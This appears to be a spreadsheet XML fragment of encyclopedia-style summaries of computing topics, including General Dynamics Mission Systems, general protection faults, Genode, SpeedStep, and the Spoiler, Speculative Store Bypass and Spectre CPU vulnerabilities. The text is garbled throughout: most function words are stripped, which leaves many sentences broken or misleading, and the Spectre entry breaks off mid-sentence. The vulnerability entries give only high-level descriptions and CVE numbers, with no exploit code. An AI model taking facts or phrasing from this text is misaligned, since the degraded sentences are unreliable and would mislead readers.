    <t>general dynamics mission systems business unit american defense aerospace company general dynamics. general dynamics mission systems integrates secure communication information systems technology. general dynamics mission systems core manufacturing secure communications networks; radios satellite technology defense, cyber, public safety, intelligence communities. history general dynamics mission systems formed january 2015 general dynamics combined company's systems advanced information systems. general dynamics systems originally owned operated government systems. general dynamics acquired government systems 1999.general dynamics advanced information systems provided mission-related systems development, integration operations support. general dynamics systems leading integrator secure communications, information systems technology.general dynamics satcom technologies, subsidiary gdms, sold international june 2020. products programs ltegeneral dynamics mission systems cell wheels (cow), deployable emergency solution, used first responders public safety officials. mobile cell tower, able cover square miles. this network created 2013.fortress technology includes virtual core network (vcn), enodeb base stations, band outdoor omni-directional user equipment, c-band user equipment, stick modem. evolved node (enodeb) base stations software defined radios house digital baseband radio frequency (rf) circuits compact, rugged, mountable enclosure eliminate external interfaces reduce installation errors setup time. range enodeb form factors offered different deployment scenarios support standard band classes frequency ranges ghz. virtual core network (vcn) virtual core network deployed wide range cots computing platforms. evolved packet core (epc) solution. cybercyber defense products include: taclane network encryptors, protecd@r data-at-rest encryptors, encryptor manager, pitbull operating system trusted network environment. maritime strategic systemsgeneral dynamics mission systems acquired bluefin robotics february 2016. they manufacturer unmanned undersea vehicles (uuvs) perform wide range missions u.s. military commercial customers.the independence-variant littoral combat ship (lcs) built general dynamics mission systems open architecture computing infrastructure (open ci). austal contracted build u.s. navy prime contractor subsequent $3.5 billion block 2010.on august, 2016 company successfully completed at-sea testing matador torpedo detection system build canada innovation program (bcip). tests conducted royal canadian navy ship. matador acoustic processing system detecting tracking heavyweight anti-ship torpedoes.radio communicationsthe cm-300/350 series version radios latest additions traffic control (atc) radios. based nexcom segment radio requirements, rack mounted transmitter receiver systems specifically designed meet dynamic mission requirements traffic control centers, commercial airports, military stations range installations. radio astronomythe meerkat telescope array, precursor telescope south africa’s planned square kilometer array (ska), comprises radio antennas south africa’s northern cape province. when completed 2016, meerkat largest powerful radio telescope southern hemisphere array completed 2024. meerkat covers eight kilometers facilitate research cosmic magnetism, galactic evolution, large-scale structure cosmos, dark matter nature transient radio sources among science projects.spacegeneral dynamics mission systems provides integrated ground segments mobile user objective system (muos) used u.s. navy, soon provide cell phone-like communications warfighters move. intelligence systems tac-maas motion imagery processing exploitation system stanag 4609 motion imagery standard profile (misp) compliant. international equivalent product d-vex sold australian-based subsidiary, general dynamics mediaware.win-t programwin-t: warfighter information network-tactical (win-t) army's tactical communications system. general dynamics army's prime contractor win-t, part general dynamics mission systems' tactical voice data communications systems, soldier's network. increment fully deployed, began fielding 2004 completed fielding 2012. november 2007, general dynamics announced million order indefinite delivery quantity contract win-t increment april 2015, general dynamics mission systems awarded million army contract maintenance repair products related increment june 2015, general dynamics secured contract increment valued $219 million. increment includes additional capabilities, mobile broadband. increment equipment remain field battalion company levels increment completed. subsidiaries gdms general dynamics mission systems canada, subsidiary gdms general dynamics general dynamics mediaware references external links general dynamics mission systems website</t>
  </si>
  <si>
    <t>Spoiler (security vulnerability)</t>
  </si>
  <si>
    <t>spoiler security vulnerability modern computer central processing units speculative execution. exploits side-effects speculative execution improve efficiency rowhammer related memory cache attacks. according reports, modern intel core cpus vulnerable attack 2019. stated processors vulnerable.spoiler issued common vulnerabilities exposures cve-2019-0162. also transient execution vulnerabilities hardware security references external links islam, saad; moghimi, ahmad; bruhns, ida; krebbel, moritz; gulmezoglu, berk; eisenbarth, thomas; sunar, berk (2019-03-01). "spoiler: speculative load hazards boost rowhammer cache attacks". arxiv:1903.00446v1 [cs.cr]. cve-2019-0162 national vulnerability database</t>
  </si>
  <si>
    <t>General protection fault</t>
  </si>
  <si>
    <t>general protection fault (gpf) instruction architectures (isas) fault type interrupt) initiated isa-defined protection mechanisms response access violation caused running code, either kernel user program. mechanism first described intel manuals datasheets intel 80286 cpu, introduced 1983; also described section 9.8.13 intel 80386 programmer's reference manual 1986. general protection fault implemented interrupt (vector number (0dh)). some operating systems also classify exceptions related access violations, illegal opcode exceptions, general protection faults, even though nothing memory protection. detects protection violation, stops executing code sends interrupt. cases, operating system removes failing process execution queue, signals user, continues executing processes. however, operating system fails catch general protection fault, i.e. another protection violation occurs operating system returns previous interrupt, signals double fault, stopping operating system. another failure (triple fault) occurs, unable recover; since 80286, enters special halt state called "shutdown", exited hardware reset. first pc-compatible system contain 80286, hardware detects shutdown state automatically resets occurs. descendants same, triple fault causes immediate system reset. specific behavior microsoft windows, general protection fault presents varied language, depending product version: unix linux, errors reported separately (e.g. segmentation fault memory errors). memory errors memory errors, faulting program accesses memory access. examples include: attempting write read-only portion memory attempting execute bytes memory designated instructions attempting read data bytes memory designated instructions other miscellaneous conflicts designation part memory usehowever, many modern operating systems implement memory access-control schemes paging instead segmentation, often case invalid memory references operating systems windows reported page faults instead general protection faults. operating systems typically provide abstraction layer (such exception handling signals) hides whatever internal processor mechanism used raise memory access error program, purposes providing standard interface handling many different types processor-generated error conditions. terms architecture, general protection faults specific segmentation-based protection comes memory accesses. however, general protection faults still used report protection violations (aside memory access violations) paging used, instructions accessible current privilege level (cpl). while theoretically possible operating system utilize paging segmentation, part, common operating systems typically rely paging bulk memory access control needs. privilege errors there things computer reserved exclusive operating system. program part operating system attempts features, cause general protection fault. additionally, storage locations reserved operating system processor itself. consequence reservation, read-only attempt write data unprivileged program produces error. technical causes faults general protection faults raised processor protected instruction encountered exceeds permission level currently executing task, either user-mode program attempting protected instruction, operating system issued request would processor undefined state. general protection faults caught handled modern operating systems. generally, fault originated user-mode program, user-mode program terminated. however, fault originated core system driver operating system itself, operating system usually saves diagnostic information either file screen stops operating. either restarts computer displays error screen, blue screen death kernel panic. segment limits exceeded segment limits exceeded: code segment (cs), data segment (ds), (extra segment) registers; accessing descriptor tables global descriptor table (gdt), interrupt descriptor table (idt) local descriptor table (ldt). segment permissions violated segment permissions violated jumping non-executable segments writing code segments, read segments reading execute-only segments segments illegally loaded this occur when: stack segment (ss) loaded segment selector read only, executable, null segment, segment descriptor privilege matching current privilege code segment (cs) loaded segment selector data, system, null segment segments loaded segment selector system segment segments loaded segment selector execute-only code segment accessing memory using registers, contain null selector switching faults occur task state segment (tss) structure when: switching busy task call jump instruction switching available task interrupt return (iret) instruction using segment selector switch pointing descriptor miscellaneous other causes general protection faults are: attempting access interrupt/exception handler virtual 8086 mode handler's code segment descriptor privilege level (dpl) greater zero attempting write reserved bits attempting execute privileged instructions current privilege level (cpl) zero writing reserved instruction accessing gate containing null segment selector executing software interrupt greater interrupt gate segment selector call, interrupt trap gate point code segment violating privilege rules enabling paging whilst disabling protection referencing interrupt descriptor table following interrupt exception interrupt, trap, task gate legacy sse: memory operand 16-byte aligned. references further reading intel architecture software developer's manual–volume system programming</t>
  </si>
  <si>
    <t>Generalized TTL security mechanism</t>
  </si>
  <si>
    <t>generalized security mechanism (gtsm) proposed internet data transfer security method relying packet's time live (ipv4) limit (ipv6) thus protect protocol stack spoofing denial service attacks. introduction desired purpose proposal verify whether packet originated adjacent node protect router infrastructure overload-based attacks. implementation protocols gtsm enabled, following procedure performed. router directly connected change outbound protocol connection protocol configured protocol peerset access control list (acl) allow packets given protocol pass route processor (rp). must either destination directly connect minus range acceptable hops connect directly. this method assumes however designated receive path configured control packets passing inbound minus range acceptable hops (when peer directly connected), packet processed sent priority queue. history many people given credit creating idea. among paul traina stewart. similar method also proposed ryan mcdowell. also protocol stack denial-of-service attack references external links generalized security mechanism (gtsm), 5082 2015, record year cybersecurity breaches</t>
  </si>
  <si>
    <t>Genetix</t>
  </si>
  <si>
    <t>genetix virtual machine created bernard hodson containing executable instructions. inspired principles alan turing allows entire operating system, including word processor utilities, kilobytes."genes" sequences pointers either point directly basic instructions another gene. genes take approximately kilobytes size together. "gene pool" consists closed section open section users made genes. also turing machine references external links bernard hodson's page genetix</t>
  </si>
  <si>
    <t>Split-brain (computing)</t>
  </si>
  <si>
    <t>split-brain computer term, based analogy medical split-brain syndrome. indicates data availability inconsistencies originating maintenance separate data sets overlap scope, either servers network design, failure condition based servers communicating synchronizing data other. this last case also commonly referred network partition. although term split-brain typically refers error state, split-brain split-horizon dns) sometimes used describe deliberate situation internal external services corporate network communicating, separate name spaces administered external computers internal ones. this requires double administration, domain overlap computer names, risk fully qualified domain name (fqdn), ambiguously occur name spaces referring different computer addresses.high-availability clusters usually heartbeat private network connection used monitor health status node cluster. example, split-brain syndrome occur private links simultaneously, cluster nodes still running, believing running. data sets cluster randomly serve clients "idiosyncratic" data updates, without coordination data sets. this lead data corruption data inconsistencies might require operator intervention cleanup. approaches dealing split-brain davidson al., surveying several approaches handle problem, classify either optimistic pessimistic. optimistic approaches simply partitioned nodes work usual; provides greater level availability, cost sacrificing correctness. once problem ended, automatic manual reconciliation might required order cluster consistent state. current implementation approach hazelcast, automatic reconciliation key-value store.the pessimistic approaches sacrifice availability exchange consistency. once network partitioning detected, access sub-partitions limited order guarantee consistency. typical approach, described coulouris al., quorum-consensus approach. this allows sub-partition majority votes remain available, remaining sub-partitions fall auto-fencing mode. current implementation approach used mongodb replica sets. another implementation galera replication mariadb mysql.modern commercial general-purpose clusters typically combination heartbeat network connections cluster hosts, quorum witness storage. challenge two-node clusters adding witness device adds cost complexity (even implemented cloud), without heartbeat fails, cluster members cannot determine active. clusters (without quorum), member fails, even members normally assign primary secondary statuses hosts, least probability 2-node cluster totally fail human intervention provided, prevent multiple members becoming active independently either directly conflicting corrupting data. references</t>
  </si>
  <si>
    <t>Genode</t>
  </si>
  <si>
    <t>genode free open-source software operating system (os) framework consisting microkernel abstraction layer user space components. framework notable open-source operating systems derived proprietary unix. characteristic design philosophy small trusted computing base primary concern security-oriented genode used basis desktop computer tablet virtual machine monitor guest operating systems. framework used trusted component secure virtualization systems arm.the small codebase genode makes flexible alternative complex unix-derived operating systems. reason framework used base system research fields virtualization, inter-process communication, stack isolation, monitoring, software development. history genode first conceived bastei architecture research report technical university dresden dresden). focus report determine practicality component-based using capability-based security. this report motivated part research microhypervisors conducted time. following success early prototype, authors report founded company genode labs develop bastei genode framework. releases project developed publicly open source project released terms affero general public license commercial entity offering alternative licensing. releases scheduled three-month intervals make changes system application binary interface (abi), application programming interface (api), issue documentation. framework available source code form following 18.02 release general purpose derivative named sculpt provided on-target binary deployment. architectural features genode builds general philosophy microkernels: smaller simpler code, easier verify trustworthiness correctness. genode extends philosophy user space composing complex applications small components. each component exists strict hierarchy parent-child relationships. component acting parent apply resource inter-process communication (ipc) access policies children. this hierarchical system layout yields intuitive partitioning privilege deescalation specialized subsystems nested within general subsystems, mitigating confused deputy problem endemic centralized superuser system policy. framework designed hosted microkernels, however features given microkernel fall mostly within common set, monolithic kernels implement superset features. abstracting features allows genode user space variety microkernels, linux. criticism genode often criticized choice implementation language, operating systems implemented include beos, fuchsia, ghost, haiku, includeos, osv, palm reactos, syllable, symbian). this critique usually asserts poor choice implementing system libraries apis inherent complexity difficulty analyzing code correct behavior. while genode make multiple inheritance templates system library, standard library allowed language features rely implicit global state, thread-local storage global allocator, removed language runtime. comprehensive static analysis possible. however, genode project publishes unit tests empirical analysis. genode components consume publish state using structured data serialized xml, contrast plain text model unix derivatives. genode framework makes effectively components easily parsed generated programmatically still possible understand edit manually. local namespacing genode lacks practical global namespace; global file system registry processes endpoints. this contrast systems unix feature ubiquitous file system allow superuser context arbitrarily manage process within system. explicitly declaring permissions routing components perceived labor-intensive relative unix. however, compartmentalizing administration allows subsystems managed mutually untrusted system administrators machine without resorting virtualizing, common isolation method. sculpt genode project publishes desktop operating system named sculpt targets contemporary consumer laptops. sculpt small base system automatic device detection configuration, control interfaces, frontends genode package manager. system feature full desktop environment, requires users deploy virtual machines hosting traditional oses fully featured desktop. sculpt distinguished genode operating system framework relies heavily dynamic reconfiguration using privileged control components contrast specialized systems static policies. also helenos, desktop microkernel based operating system qnx, proprietary unix-like operating system hosted microkernel qubes desktop operating system provides security virtualization subgraph (operating system), linux distribution provides security sandboxing capability-based security secure default references external links official websitesofficial website genodelabs githubresearch projectskv-cache: scalable high-performance web-object cache manycore trapps: secure compartments evil cloud development embedded platform secure services secure-os project madras kernel isolation capability-based security operating system mobile device security trustzone</t>
  </si>
  <si>
    <t>Gentex (automotive manufacturer)</t>
  </si>
  <si>
    <t>gentex corporation (nasdaq: gntx) american electronics technology company develops, designs manufactures automatic-dimming rear-view mirrors, camera-based driver assistance systems, equipment global automotive industry. they produce dimmable aircraft windows commercial, business general aviation markets. addition, company produces photoelectric smoke detectors, signaling devices, homelink wireless control system north american fire protection market.founded 1974, gentex corporation based zeeland, michigan. they created first dual-sensor photoelectric smoke detector, pioneered electrochromic automatic-dimming mirrors automotive industry smart windows aviation industry. gentex 1,700 patents various technologies products.in analyses industry 2001, gentex highest market-to-book value automotive supplier. 2020, percent company's sales derived automotive market. 2018, less percent company's business comes aerospace applications dimmable windows. gentex corporation considered major player fire protection systems market. history gentex founded 1974 fred bauer manufacturer fire protection products. bauer became company 1986, also served chairman board directors. retired 2018, succeeded steve downing james wallace chairman board. fire protection gentex created first dual-sensor photoelectric smoke detector, considered less prone false alarms, still quickly detecting smoldering fires. gentex smoke detectors used hospitals, hotels, offices buildings worldwide. early 1990s, gentex introduced smoke detector equipped strobe light designed alert deaf hard hearing individuals. gentex manufactures wide range photoelectric detectors fire alarm systems, standalone, interconnect systems. automotive mirrors gentex first introduced rear-view mirror automatically adjusts potentially dangerous glare conditions 1982. gentex began selling automatic dimming mirror based electrochromism 1987. electrochromic placed pieces glass, allows mirror proportion glare level. reduction glare eliminates temporary blind spot caused troxler effect glare source leaves field view. these mirrors forward- rearward-facing sensors measure ambient light level glare approaching vehicles, respectively.in 1991, exterior electrochromic mirrors added gentex product line. these mirrors operate principle interior mirrors. 1997 geometry mirror's surface adapted create spherically curved glass goals eliminating blind spots offering expanded field view.as 2016 gentex introduced gentex full display mirror, provides video display panoramic view behind vehicle. quality smoke detection 2020 gentex expanding smoke detection capabilities, developing sensing units cars vehicles, continuously sample quality smoke, vaping, airborne contaminants. sensors publicly used vehicles could sanitation security applications. additional features compass/temperature display light onstar homelink wireless control system tire pressure indicator smartbeam, company's automatic headlight dimmer automotive grade microphones rear camera display (rcd) realtime panoramic view rear vehicle reverse gear exterior mirror turn signal repeaters complex exterior mirror geometries aerospace gentex aerospace delivered electrochromic smart windows boeing dreamliner. these windows viologens redox agent adjust amount light allowed window, similar technology gentex' auto-dimming rearview mirrors. aircraft windows electronically controlled: electrical signal affects action conductive medium layers glass. windows adjusted passenger crew control amount light enters, five levels completely clear completely darkened. windows percent larger standard aircraft windows.the aircraft window included exhibition design life now: national design triennial, appeared smithsonian's cooper-hewitt national design museum york city institute contemporary art, boston 2007.gentex also developing electronically dimmable windows aircraft capable automatically responding changes sunlight, adapting example aircraft turns. windows darken complete black-out capability seconds.gentex as9100 certified, industry standard required majority major aircraft manufacturers, capable meeting production standards original equipment manufacturer (oem) aircraft. references external links official gentex website info, 2006</t>
  </si>
  <si>
    <t>Geom raid5</t>
  </si>
  <si>
    <t>geom_raid5 storage module created freebsd operating system. facilitates raid5 functionality without need hardware raid controller. geom_raid5 allows storage large amounts data protected disk failure, providing good throughput performance. like freebsd storage modules, geom_raid5 utilizes geom framework. built kernel loadable module (kld) allows inside freebsd kernel. module compiled freebsd release newer releases. geom_raid5 also incorporated freenas, operating system dedicated network attached storage. author, arne woerner, released software license, making geom_raid5 osi-compliant open source software. comparing software raid5 solutions geom_raid5 distinguishes providing advanced features high performance. while theoretical maximum write speed speed slowest disk (number disks latest version able achieve theoretical maximum. this huge contrast software raid5 solutions sometimes achieve less throughput combined significantly higher utilization. reason huge difference lies geom_raid5's design. order write data raid5 volume, data must often first read order calculate parity information protects data loss case single disk failure. using request combining full stripe block 'collected' read longer required. this means harddrive heads need change position every time write data contiguously, theoretically full speed. course, works sequential transfers sometimes even filesystem write contiguously. using request combining, geom_raid5 manages outperform software raid5 solution date, capable reaching write-speeds associated hardware raid5 budget-level hardware. currently module finalized. when stable version released author release information design disclose benchmarks. particular, benchmarks showing geom_raid5 performance versus zfs's raid-z long-awaited users. variants various incarnations geom raid5 exist trade speed memory usage. geom_raid5the stable version slower variants certain cases geom_raid5 tnguses memory deliver better transfer rates geom_raid5 ppmemory usage speed uses less memory slower. uses memory original geom_raid5 driver faster. also claimed pp's code best cleanest three external links freebsd perforce: repository geom_raid5 geom_raid5 sources: http://www.wgboome.org/geom_raid5.html</t>
  </si>
  <si>
    <t>Geoplexing</t>
  </si>
  <si>
    <t>geoplexing computer science term relating duplication computer storage applications within server farm geographically diverse locations purpose fault tolerance. name comes contraction geographical multiplex. description geoplex, server clusters duplicated geographically separate sites. geoplexes "active-active" (where clusters used tandem) "active-passive" (where clusters kept spare).data applications shared either cloning partitioning. with cloning, server cluster handles applications, applications data cloned servers geoplex, load balancer distributes requests cloned servers. meanwhile, partitioning, hardware applications duplicated geoplex, application datasets divided servers, therefore requests routed appropriate server. references</t>
  </si>
  <si>
    <t>Spiradisc</t>
  </si>
  <si>
    <t>spiradisc (often misspelled "spiradisk") copy protection scheme used sierra on-line floppy disk releases apple technique, developed mark duchaineau, involved writing data spiralling paths disk rather concentric circles. initially, commercial copying software nibbler could successfully copy disks applied to.games used spiradisc copy protection include lunar leepers, frogger, ultima star maze, jawbreaker, maze craze construction set. eventually, copy plus version able successfully defeat copy protection. references external links computist magazine articles andy mcfadden</t>
  </si>
  <si>
    <t>Spinning pinwheel</t>
  </si>
  <si>
    <t>spinning pinwheel variation mouse pointer arrow, used apple's macos indicate application busy.officially, macos human interface guidelines refers spinning wait cursor, also known names, including spinning beach ball, spinning wheel death, spinning beachball death, ferris wheel death. history wristwatch first wait cursor early versions classic apple's hypercard first popularized animated cursors, including black-and-white spinning quartered circle resembling beach ball. beach-ball cursor also adopted indicate running script code hypertalk-like applescript. cursors could advanced repeated hypertalk invocations "set cursor busy". wait cursors activated applications performing lengthy operations. some versions apple installer used animated "counting hand" cursor. other applications provided theme-appropriate custom cursors, revolving yang symbol, fetch's running dog, retrospect's spinning tape, tools' tapping fingers. apple provided standard interfaces animating cursors: originally cursor utilities (spincursor, rotatecursor) and, later, appearance manager (setanimatedthemecursor). from nextstep nextstep used monochrome icon resembling spinning magneto-optical disk. some next computers included optical drive often slower magnetic hard drive common reason wait cursor appear. when color support added nextstep 2.0, color versions icons added. wait cursor updated reflect bright rainbow surface removable disks, icon remained even later machines began using hard disk drives primary storage. contemporary drives even slower kbit/s). with arrival wait cursor often called "spinning beach ball" press, presumably authors knowing next history relating hypercard wait cursor. two-dimensional appearance kept essentially unchanged next rhapsody/mac server otherwise user interface design resembling 8/platinum theme, 10.0/cheetah 10.1/puma, introduced aqua user interface theme. 10.2/jaguar gave cursor glossy rounded "gumdrop" look keeping interface elements. 10.10, entire pinwheel rotates (previously overlaying translucent layer moved). with 10.11 capitan spinning wait-cursor's design updated. less shadowing brighter, solid colors better match design user interface. colors also turn spinning, texture. system usage single-tasking operating systems like original macintosh operating system, wait cursor might indicate computer completely unresponsive user input, indicate response temporarily slower usual disk access. this changed multitasking operating systems system software usually possible switch another application continue work there. individual applications could also choose display wait cursor long operations (and often able cancelled keyboard command). after transition (macos), apple narrowed wait cursor meaning. display wait cursor controlled operating system, application. this could indicate application infinite loop, performing lengthy operation ignoring events. each application event queue receives events operating system (for example, presses mouse button clicks); application takes longer seconds process events event queue (regardless cause), operating system displays wait cursor whenever cursor hovers application's windows. this meant indicate application temporarily unresponsive, state application recover. also indicate part application entered unrecoverable state infinite loop. during time user prevented closing, resizing, even minimizing windows affected application (although moving window still possible well previously hidden parts window usually redrawn, even application otherwise unresponsive). while application unresponsive, typically applications usable. file system network delays another common cause. guidelines, tools methods developers default, events (and actions initiate) processed sequentially, works well event involves trivial amount processing, spinning wait cursor appearing operation complete. processing takes long, application appear unresponsive. developers prevent using separate threads lengthy processing, allowing application's main thread continue responding external events. however, greatly increases application complexity. another approach divide work smaller packets nsrunloop grand central dispatch. bugs applications cause stop responding events; instance, infinite loop deadlock. applications thus afflicted rarely recover. problems virtual memory system—such slow paging caused spun-down hard disk disk read-errors—will cause wait cursor appear across multiple applications, hard disk virtual memory system recover.instruments application comes developer tools. along functions, allows user monitor sample applications either responding performing lengthy operation. each time application respond spinning wait cursor activated, instruments sample process determine code causing application stop responding. with information, developer rewrite code avoid cursor activated. apple's guidelines suggest developers avoid invoking spinning wait cursor, suggest user interface indicators, asynchronous progress indicator. alternate names spinning wait cursor commonly referred (spinning) death/doom). common words phrases replaced include: disk (beach) ball (rainbow) wheel (rainbow) pinwheel pizza marble lollipop also windows wait cursor pointer (user interface) notes references external links apple human interface guidelines: standard cursors apple's website. perceived responsiveness: avoid spinning cursor apple's website. troubleshooting "spinning beach ball death" excerpt “troubleshooting book information deal spinning wait cursor problems.</t>
  </si>
  <si>
    <t>SpeedStep</t>
  </si>
  <si>
    <t>enhanced speedstep series dynamic frequency scaling technologies (codenamed geyserville including speedstep, speedstep speedstep iii) built intel microprocessors allow clock speed processor dynamically changed different p-states) software. this allows processor meet instantaneous performance needs operation performed, minimizing power draw heat generation. eist (speedstep iii) introduced several prescott series first quarter 2005, namely pentium 660. intel speed shift technology (sst) introduced intel skylake processor.enhanced intel speedstep sometimes abbreviated eist. intel's trademark "intel speedstep" cancelled trademark invalidated 2012. explanation running processor high clock speeds allows better performance. however, processor lower frequency (speed), generates less heat consumes less power. many cases, core voltage also reduced, reducing power consumption heat generation. using speedstep, users select balance power conservation performance best suits them, even change clock speed dynamically processor burden changes. power consumed capacitance running frequency voltage approximately: {\displaystyle p=cv^{2}f} given processor, fixed value. however, vary considerably. example, pentium clock frequency stepped decrements range ghz. time, voltage requirement decreases 1.484 0.956 result power consumption theoretically goes factor 6.4. practice, effect smaller instructions less energy tick clock others. example, operating system busy, tends issue halt (hlt) instructions, suspend operation parts time period, uses less energy tick clock executing productive instructions normal state. given rate work, running higher clock rate execute greater proportion instructions. simple equation relates power, voltage frequency also take account static power consumption cpu. this tends change frequency, change temperature voltage. electrons, electrons exposed stronger electric field likely migrate across gate "gate leakage" current, leading increase static power consumption. older processors pentium 4-m, older versions speedstep, fewer clock-speed increments. speedstep technology partly responsible reduced power consumption intel's pentium processor, part centrino brand. known issues microsoft reported problems previewing video files speedstep equivalent powernow!) enabled windows 2000 windows operating system support solaris supported speedstep since opensolaris sxde 9/07. older versions microsoft windows, windows 2000 earlier, need special driver dashboard application access speedstep feature. intel's website specifically states drivers must come computer manufacturer; generic drivers supplied intel enable speedstep older windows versions cannot obtain manufacturer's driver. under microsoft windows speedstep support built power management console control panel. windows user regulate processor speed indirectly changing power schemes. "home/office desk" setting disables speedstep, "portable/laptop" power scheme enables speedstep, "max battery" uses speedstep slow processor minimal power levels battery weakens. speedstep settings power schemes, either built-in custom, cannot modified control panel's gui, modified using powercfg.exe command-line utility. linux kernel subsystem called "cpufreq", tunable power-scheme command line, devoted control operating frequency voltage cpu. linux runs intel, amd, makes cpu. newer version windows linux kernel support intel speed shift technology.in contrast, supplied supported drivers competing powernow! technology work windows 2000, also advanced configuration power interface (acpi) powertune (for gpus) turbo core (for cpus) cool'n'quiet cpu-z dynamic frequency scaling intel turbo boost power management references</t>
  </si>
  <si>
    <t>SpeedFan</t>
  </si>
  <si>
    <t>speedfan system monitor microsoft windows read temperatures, voltages speeds computer components. change computer speeds depending temperature various components. program display system variables charts indicator system tray. fully configurable user events defined execute specific actions based system status hard disk support speedfan also monitors s.m.a.r.t. readings eide, sata scsi hard disks. starting version 4.35, speedfan fully supports areca raid controllers. version 4.38 added full support amcc/3ware sata raid controllers. hard disk in-depth online analysis speedfan offers feature named "in-depth online analysis" compares hard disk's s.m.a.r.t. data database statistical models hard disks allowing early detection potentially degraded hard disks. messages inform user specific situations problems, almico says human expert looked data”. reception extended review version 4.46 2012 silent review website summarized, "the biggest drawback speedfan] often takes work properly configure", continued, "its highly customizable incredibly powerful nature unmatched competition bonus, also free, lightweight regularly updated features better motherboard support." softonic review version 4.49 graded speedfan 8/10, listing useful, "helpful charts monitor performance health", noting requests administrator rights launch, "can intimidating less tech savvy".current alternatives speedfan include open hardware monitor, realtemp, many vendor-specific pieces software (e.g. motherboard, hard drive, utilities supplied vendors). also argus monitor motherboard monitor system monitor comparison s.m.a.r.t. tools lm_sensors hw.sensors references external links official website</t>
  </si>
  <si>
    <t>Speculative Store Bypass</t>
  </si>
  <si>
    <t>speculative store bypass (ssb) (cve-2018-3639) name given hardware security vulnerability exploitation takes advantage speculative execution similar meltdown spectre security vulnerabilities. affects arm, intel families processors. discovered researchers microsoft security response center google project zero (gpz). after leaked 2018 part group eight additional spectre-class flaws provisionally named spectre-ng, first disclosed public "variant 2018, alongside related speculative execution vulnerability designated "variant 3a". details speculative execution exploit variant referred speculative store bypass (ssb), assigned cve-2018-3639. named variant fifth variant spectre-meltdown class vulnerabilities.steps involved exploit: "slowly" store value memory location "quickly" load value memory location utilize value read disrupt cache detectable impact mitigation intel claims browsers already patched mitigate spectre variants partially protected variant intel said statement likelihood users affected "low" protections would default impact performance. chrome javascript team confirmed effective mitigation variant software infeasible, part performance impact.intel planning address variant releasing microcode patch creates hardware flag named speculative store bypass disable (ssbd). stable microcode patch delivered, intel suggesting patch ready coming weeks". many operating system vendors releasing software updates assist mitigating variant however, microcode/firmware updates required software updates effect. speculative execution exploit variants references also transient execution vulnerabilities external links website detailing meltdown spectre vulnerabilities, hosted graz university technology google project zero write-up meltdown/spectre checker gibson research corporation</t>
  </si>
  <si>
    <t>Spectre (security vulnerability)</t>
  </si>
  <si>
    <t>spectre subset security vulnerabilities within class vulnerabilities known microarchitectural timing side-channel attacks. these affect modern microprocessors perform branch prediction forms speculation. processors, speculative execution resulting branch misprediction leave observable side effects reveal private data attackers. example, pattern memory accesses performed speculative execution depends private data, resulting state data cache constitutes side channel attacker able extract information private data using timing attack.two common vulnerabilities exposures related spectre, cve-2017-5753 (bounds check bypass, spectre-v1, spectre 1.0) cve-2017-5715 (branch target injection, spectre-v2), issued. engines used javascript found vulnerable. website read data stored browser another website, browser's memory itself.in early 2018, intel reported would redesign cpus help protect spectre related meltdown vulnerabilities (especially, spectre variant meltdown, spectre variant october 2018, intel reported added hardware firmware mitigations regarding spectre meltdown vulnerabilities latest processors. history 2002 2003, yukiyasu tsunoo colleagues showed attack misty symmetric ciphers, respectively. 2005, daniel bernstein university illinois, chicago reported extraction openssl cache timing attack, colin percival working attack openssl using intel processor's cache. 2013 yuval yarom katrina falkner university adelaide showed measuring access time data lets nefarious application determine information read cache not. read cache access time would short, meaning data read could contain private encryption algorithms. this technique used successfully attack gnupg, cryptographic implementations. january 2017, anders fogh gave presentation ruhruniversität bochum automatically finding covert channels, especially processors pipeline used processor core.spectre proper discovered independently jann horn google's project zero paul kocher collaboration daniel genkin, mike hamburg, moritz lipp yuval yarom. microsoft vulnerability research extended browsers' javascript engines. made public conjunction another vulnerability, meltdown, january 2018, affected hardware vendors already made aware issue june 2017. vulnerability called spectre "based root cause, speculative execution. easy fix, haunt quite time."on january 2018, reported intel shared news meltdown spectre security vulnerabilities chinese technology companies, notifying u.s. government flaws.on january 2018, microsoft reported released windows update disabled problematic intel microcode fix—which had, cases, caused reboots, system instability, data loss corruption—issued earlier intel spectre variant attack. woody leonhard computerworld expressed concern installing microsoft patch.since disclosure spectre meltdown january 2018, research vulnerabilities related speculative execution done. 2018, eight additional spectre-class flaws provisionally named spectre-ng (german computer magazine) reported affecting intel possibly processors. intel reported preparing patches mitigate flaws. affected core-i processors xeon derivates since nehalem (2010) atom-based processors since 2013. intel postponed release microcode updates july 2018. 2018, intel published information first spectre-ng class side-channel vulnerabilities cve-2018-3640 (rogue system register read, variant cve-2018-3639 (speculative store bypass, variant also referred intel sa-00115 psr-2018-0074, respectively. according amazon deutschland, cyberus technology, sysgo, colin percival (freebsd), intel revealed details third spectre-ng variant cve-2018-3665 (lazy state restore, intel sa-00145) june 2018. also known lazy state leak (abbreviated "lazyfp") "spectre-ng 3".on july 2018, intel revealed details another spectre-ng class vulnerability called "bounds check bypass store" (bcbs), "spectre 1.1" (cve-2018-3693), able write well read bounds. another variant named "spectre 1.2" mentioned well.in late july 2018, researchers universities saarland california revealed ret2spec (aka "spectre v5") spectrersb, types code execution vulnerabilities using return stack buffer (rsb).at july 2018, researchers graz university technology revealed "netspectre", type remote attack similar spectre need attacker-controlled code target device all.on october 2018, intel reported added hardware firmware mitigations regarding spectre meltdown vulnerabilities latest processors.in november 2018, five variants attacks revealed. researchers attempted compromise protection mechanisms using code exploit pattern history table, branch target buffer, return stack buffer, branch history table.in august 2019, related transient execution vulnerability, spectre swapgs (cve-2019-1125), reported.in late april 2021, related vulnerability discovered breaks security systems designed mitigate spectre micro-op cache. vulnerability known affect skylake later processors intel zen-based processors amd. mechanism spectre vulnerability tricks program accessing arbitrary locations program's memory space. attacker read content accessed memory, thus potentially obtain sensitive data. instead single easy-to-fix vulnerability, spectre white paper describes whole class potential vulnerabilities. they based exploiting side effects speculative execution, common means hiding memory latency speeding execution modern microprocessors. particular, spectre centers branch prediction, special case speculative execution. unlike related meltdown vulnerability disclosed time, spectre rely specific feature single processor's memory management protection system, instead generalized idea. starting point white paper side-channel timing attack applied branch prediction machinery modern out-of-order executing microprocessors. while architectural level documented processor data books, results misprediction specified discarded fact, resulting speculative execution still leave side effects, like loaded cache lines. these affect so-called non-functional aspects computing environment later side effects including limited memory access timing visible malicious program, engineered depend sensitive data held victim process, side effects result data becoming discernible. this happen despite formal architecture-level security arrangements working designed; case, lower, microarchitecture-level optimizations code execution leak information essential correctness normal program execution. spectre paper displays attack four essential steps: first, shows branch prediction logic modern processors trained reliably miss based internal workings malicious program. goes show subsequent difference cache hits misses reliably timed, simple non-functional difference fact subverted covert channel extracts information unrelated process's inner workings. thirdly, paper 